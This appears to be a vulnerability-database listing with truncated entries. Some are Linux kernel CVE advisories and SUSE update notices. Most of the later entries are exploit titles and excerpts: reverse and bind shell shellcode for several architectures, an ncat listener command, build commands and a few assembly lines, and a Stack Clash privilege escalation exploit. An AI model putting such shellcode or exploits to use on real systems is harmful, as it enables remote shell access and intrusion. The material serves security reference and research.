Siemens SIMATIC S7-1500 Missing Release of Memory after Effective Lifetime (CVE-2025-39756)

"In the Linux kernel, the following vulnerability has been resolved: fs: Prevent file descriptor table allocations exceeding INTMAX When sysctlnropen is set to a very high value for example, 1073741816 as set by systemd, processes attempting to use file descriptors near the limit can trigger...

Siemens SIMATIC Devices Improper Control of Resource Identifiers (CVE-2024-42265)

"In the Linux kernel, the following vulnerability has been resolved: protect the fetch of -fdfd in dodup2 from mispredictions both callers have verified that fd is not greater than -maxfds; however, misprediction might end up with tofree = fdt-fdfd; being speculatively executed. That's wrong for...

SUSE-SU-2025:03384-1 Security update for the Linux Kernel

The SUSE Linux Enterprise 15 SP3 RT kernel was updated to receive various security bugfixes. The following security bugs were fixed: - CVE-2022-49492: nvme-pci: fix a NULL pointer dereference in nvmeallocadmintags bsc1238954. - CVE-2022-50116: kernel: tty: ngsm: fix deadlock and link starvation i...

SUSE-SU-2025:03283-1 Security update for the Linux Kernel

The SUSE Linux Enterprise 15 SP5 RT kernel was updated to receive various security bugfixes. The following security bugs were fixed: - CVE-2022-49980: USB: gadget: fix use-after-free read in usbudcuevent bsc1245110. - CVE-2022-50116: tty: ngsm: fix deadlock and link starvation in outgoing data pa...

UBUNTU-CVE-2025-39756

In the Linux kernel, the following vulnerability has been resolved: fs: Prevent file descriptor table allocations exceeding INTMAX When sysctlnropen is set to a very high value for example, 1073741816 as set by systemd, processes attempting to use file descriptors near the limit can trigger massi...

CVE-2025-39756

CVE-2025-39756 is a Linux kernel issue where extremely high nr_open values (e.g., 1073741816) can trigger massive file descriptor table allocations that exceed INT_MAX, causing a kernel warning and impractical memory requests (>8GB) during operations near the FD limit. The root cause involves ...

CVE-2025-39756 fs: Prevent file descriptor table allocations exceeding INT_MAX

In the Linux kernel, the following vulnerability has been resolved: fs: Prevent file descriptor table allocations exceeding INTMAX When sysctlnropen is set to a very high value for example, 1073741816 as set by systemd, processes attempting to use file descriptors near the limit can trigger massi...

Security update for the Linux Kernel

The SUSE Linux Enterprise 15 SP4 RT kernel was updated to receive various security bugfixes. The following security bugs were fixed: CVE-2022-49138: Bluetooth: hcievent: Fix checking conn for leconncompleteevt bsc1238160. CVE-2023-52923: netfilter: nftables: split async and sync catchall in two...

kernel: protect the fetch of ->fd[fd] in do_dup2() from mispredictions

In the Linux kernel, the following vulnerability has been resolved: protect the fetch of -fdfd in dodup2 from mispredictions both callers have verified that fd is not greater than -maxfds; however, misprediction might end up with tofree = fdt-fdfd; being speculatively executed. That's wrong for t...

Linux/MIPS - N32 MSB Reverse Shell Shellcode

/ mipsn32msblinuxrevsh.c - MIPS N32 MSB Linux reverse Copyright c 2022 Marco Ivaldi Basic MIPS N32 MSB Linux reverse shellcode, showcasing various techniques to avoid badchars. Cross-compile https://buildroot.org/ with: $ mips64-linux-gcc -static mipsn32msblinuxrevsh.c -o revsh Tested on Linux...

Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)

Exploit Title: Linux/x86 - Bind User Specified Port Shell /bin/sh Shellcode 102 bytes Exploit Author: d7x Tested on: Ubuntu x86 / Linux/x86 Bind Shell /bin/sh with dynamic port binding Null-Free Shellcode 102 bytes Usage: gcc -z execstack -o bindshell bindshell.c ./bindshell 7000 Binding to 7000...

Linux/x86 reverse TCP Shellcode (84 bytes)

Title: Linux/x86 - Reverse TCP Shellcode 84 bytes Author: Xenofon Vassilakopoulos Tested on: Linux 3.13.0-32-generic 57precise1-Ubuntu i686 i386 GNU/Linux Architecture: i686 GNU/Linux Shellcode Length: 84 bytes SLAE-ID: SLAE - 1314 --------------------- Reverse Shellcode ---------------------...

Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)

Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode 91 bytes Author: bolonobolo Tested on: Linux x86 Software: N/A CVE: N/A / global start section .text start: ;socket xor ecx, ecx ; xoring ECX xor ebx, ebx ; xoring EBX mul ebx ; xoring EAX and EDX inc cl ; ECX should be 1...

Linux/x86_64 - Reverse(0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode (70 bytes)

/ Title: Linux/x8664 - Reverse0.0.0.0:4444/TCPShell/bin/sh- Null Free Shellcode ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 70 bytes ;github = https://github.com/STARRBOY compilation and execution of assembly code ------------------------------------- nasm -felf64...

Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)

Linux/x86 - Reverse TCP ::FFFF:192.168.1.5:4444/TCP Shell /bin/sh + Null-Free + IPv6 Shellcode 86 bytes. Shellcode exploit for Linuxx86 platform Title: Linux/x86 - Reverse TCP shell IPv6 + Null Free Shellcode Author: Kartik Durg Shellcode Length: 86 BYTES Student-ID: SLAE-1233 Note...

Linux/x64 - Reverse (::1:1337/TCP) + IPv6 + Password (pwnd) Shellcode (115 bytes)

Linux/x64 - Reverse ::1:1337/TCP + IPv6 + Password pwnd Shellcode 115 bytes. Shellcode exploit for Linuxx86-64 platform / ; Title : Reverse Shell IPv6 with Password - Shellcode ; Author : Hashim Jawad @ihack4falafel ; OS : Linux kali 4.15.0-kali2-amd64 1 SMP Debian 4.15.11-1kali1 2018-03-21 x8664...

Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell Shellcode (96 Bytes)

/ ; Title: Linux/x86 - TCP reverse shell ; Author: Paolo Perego ; Website: https://codiceinsicuro.it ; Blog post: https://codiceinsicuro.it/slae/assignment-2-create-a-reverse-shellcode/ ; Twitter: @thesp0nge ; SLAE-ID: 1217 ; Purpose: connect to a given IP and PORT and spawning a reverse shell if...

Linux/ARM (Raspberry Pi) - Bind TCP Shell (4444/TCP) Shellcode (192 bytes)

/ Andrea Sindoni - @invictus1306 This schellcode is part of my episodes: - ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/ Enviroment: Raspberry pi 3 Default settings for port:4444 @.syntax unified .global start start: mov r1, 0x5C @ r1=0x5c mov r5, 0x11 @...

Linux Kernel (Debian 78910 Fedora 232425 CentOS 5.35.116.06.87.2.1511) - ldso_hwcap Stack Clash Local Privilege Escalation

Linux Kernel Debian 78910 Fedora 232425 CentOS 5.35.116.06.87.2.1511 - ldsohwcap Stack Clash Local Privilege Escalation / Linuxldsohwcap.c for CVE-2017-1000366, CVE-2017-1000370 Copyright C 2017 Qualys, Inc. myimportanthwcaps adapted from elf/dl-hwcaps.c, part of the GNU C Library: Copyright C...

Linux/x86 - Reverse UDP Shellcode (668 bytes)

; SLAE-X ; thanks to writesup from previou students : ; assignment: 2. create a reverse shell ; originality: using UDP instead TCP ; usage : sudo ncat -lup 53 on the receiving end ; warning, this shellcode might contains null byte if you use certain ip / address %define htonsx x 8 & 0xFF | x & 0x...